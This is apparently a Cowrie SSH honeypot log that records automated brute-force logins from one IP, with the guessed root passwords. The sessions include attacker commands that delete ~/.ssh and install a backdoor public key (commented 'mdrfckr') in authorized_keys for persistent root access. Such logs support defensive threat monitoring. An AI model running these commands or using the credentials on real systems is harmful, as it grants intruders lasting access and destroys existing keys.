{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.202939Z","src_ip":"212.227.235.229","session":"83baa6281f39"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.204877Z","src_ip":"212.227.235.229","session":"83baa6281f39"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.796255Z","src_ip":"212.227.235.229","session":"2096d90f1fd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57804,"dst_ip":"1.2.3.4","dst_port":22,"session":"332f17e12a6d","protocol":"ssh","message":"New connection: 212.227.235.229:57804 (1.2.3.4:22) [session: 332f17e12a6d]","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.998969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:40.999902Z","src_ip":"212.227.235.229","session":"332f17e12a6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:01:41.207117Z","src_ip":"212.227.235.229","session":"332f17e12a6d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:01:42.063672Z","src_ip":"212.227.235.229","session":"332f17e12a6d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:42.268515Z","src_ip":"212.227.235.229","session":"ac4f095a929d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:42.269377Z","src_ip":"212.227.235.229","session":"332f17e12a6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43890,"dst_ip":"1.2.3.4","dst_port":22,"session":"99efdb9a3c04","protocol":"ssh","message":"New connection: 212.227.235.229:43890 (1.2.3.4:22) [session: 99efdb9a3c04]","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.327526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.328463Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.428163Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.630155Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.630887Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.731718Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"e6:29:2a:05:36:85:a4:2a:3a:4d:01:50:2e:7e:66:cb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T22:01:43.733336Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:53.327726Z","src_ip":"212.227.235.229","session":"99efdb9a3c04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37128,"dst_ip":"1.2.3.4","dst_port":22,"session":"358798ad64e8","protocol":"ssh","message":"New connection: 212.227.235.229:37128 (1.2.3.4:22) [session: 358798ad64e8]","sensor":"my-vps","timestamp":"2025-09-08T22:01:59.880594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:01:59.881415Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:00.194118Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123@","message":"login attempt [root/Qwer123@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:01.483255Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:02.164693Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:02.165164Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:02.165950Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:02.483962Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:03.169386Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:03.172098Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:03.487298Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:03.488287Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37140,"dst_ip":"1.2.3.4","dst_port":22,"session":"3568f6b57492","protocol":"ssh","message":"New connection: 212.227.235.229:37140 (1.2.3.4:22) [session: 3568f6b57492]","sensor":"my-vps","timestamp":"2025-09-08T22:02:03.798593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:03.799498Z","src_ip":"212.227.235.229","session":"3568f6b57492"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:04.112134Z","src_ip":"212.227.235.229","session":"3568f6b57492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57030,"dst_ip":"1.2.3.4","dst_port":22,"session":"602fc0237f6f","protocol":"ssh","message":"New connection: 212.227.235.229:57030 (1.2.3.4:22) [session: 602fc0237f6f]","sensor":"my-vps","timestamp":"2025-09-08T22:02:05.145219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:05.145891Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:05.316782Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:05.363165Z","src_ip":"212.227.235.229","session":"3568f6b57492"}
{"eventid":"cowrie.login.success","username":"root","password":"p0o9i8","message":"login attempt [root/p0o9i8] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:06.041366Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:06.405704Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:06.406396Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:06.407577Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:06.579687Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:06.678207Z","src_ip":"212.227.235.229","session":"3568f6b57492"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:07.026017Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.027173Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37148,"dst_ip":"1.2.3.4","dst_port":22,"session":"638434ab2bd4","protocol":"ssh","message":"New connection: 212.227.235.229:37148 (1.2.3.4:22) [session: 638434ab2bd4]","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.031784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.033598Z","src_ip":"212.227.235.229","session":"638434ab2bd4"}
